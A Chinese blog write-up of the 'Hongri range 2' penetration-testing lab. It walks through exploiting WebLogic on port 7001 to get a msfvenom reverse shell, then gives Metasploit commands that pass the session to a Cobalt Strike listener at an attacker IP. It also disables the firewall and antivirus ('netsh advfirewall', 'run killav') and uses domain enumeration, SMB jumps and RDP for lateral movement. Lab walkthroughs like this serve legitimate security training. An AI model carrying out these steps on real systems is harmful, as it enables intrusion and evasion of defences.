红日靶场2

搭建:如果虚拟机选择桥接模式,则互相ping不通,主机也ping不通虚拟机1,但是如果是NAT模式,就可以互相PING通。

打靶:初始信息:只知道192.168.111.80

NMAP扫描192.168.111.80端口,经测试有7001可利用

法1(msf攻击):kali使用weblogic扫描

发现漏洞,但是msf尝试攻击失败,把防火墙和360关了也没用:

尝试其他办法

法2(主动连接):

使用weblogictool检测工具和JAVA反序列化检测工具写入木马,但是不管是内存码还是一句话,蚁剑和哥斯拉都连不上。

法3(反弹连接)(成功):

msf 生成反弹🐎

上传后msf开启监听,浏览器访问目标文件地址,终于成功上线:

横向渗透:

msf上线cs:

msf->cs

(1)background // 挂起 会话.

(2)use exploit/windows/local/payload_inject

(3)set payload windows/meterpreter/reverse_http

(4)set lhost 192.168.0.101 //设置 CS 服务端的 IP 地址.

(5)set lport 8080 //设置 CS 服务端的 监听的端口(刚刚上面创建的端口号一样[CS的])

(6)set DisablePayloadHandler True

(7)set PrependMigrate True

(8)sessions -l //查看 会话 是多少则设置多少

(9)set session 1 [一般是 1(上面查看的结果)]

(10)exploit // 进行 测试

信息收集+关防火墙和杀软

netsh advfirewall set allprofiles state off 关闭防火墙

run killav 关闭杀软
net view CS添加域内用户
ipconfig /all
run post/windows/gather/enum_domain 查看域控
run post/windows/gather/enum_ad_computers查看域内成员
net group "domain controllers" /domain     #查看域控:

不知道是什么原因,查看域控的命令执行错误,直接上web这台机子也错误,但是PC可以,于是跳过,就当已经知道域控和PC的名。

尝试ping 主机+域名的方式来得到内网各个机的IP地址,但是ping不通,解决办法是将WEB的内网网卡也切换成与其他机子一样的VM2,就能ping了

但是net view时候出现了错误,PC和DC可以view出来,但WEB view不出来,上网搜后发现是因为Computer Browser这个服务没有开启,在WEB上手动开启这个服务,先把属性从禁用调成手动,然后手动开启,尝试net view,但是提示列表是空的,随后发现DC待机了,重新开启再net view,终于view出来了:

CS已经可以NET VIEW,但是view了之后还是没添加新主机,之后发现使用端口存活探测可以添加内网主机:

portscan 10.10.10.0/24 1-1024,3389,5000-6000 arp 1024    探测存活主机

然后就是常规的设置SMB监听然后JUMP就行,最终成功拿下:

法2:远程桌面

由于几个主机都开启了3398,所以渗透成功,只不过在横向到PC的时候发生了顶号的情况,警示我们用自己创的新账号登比较好

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇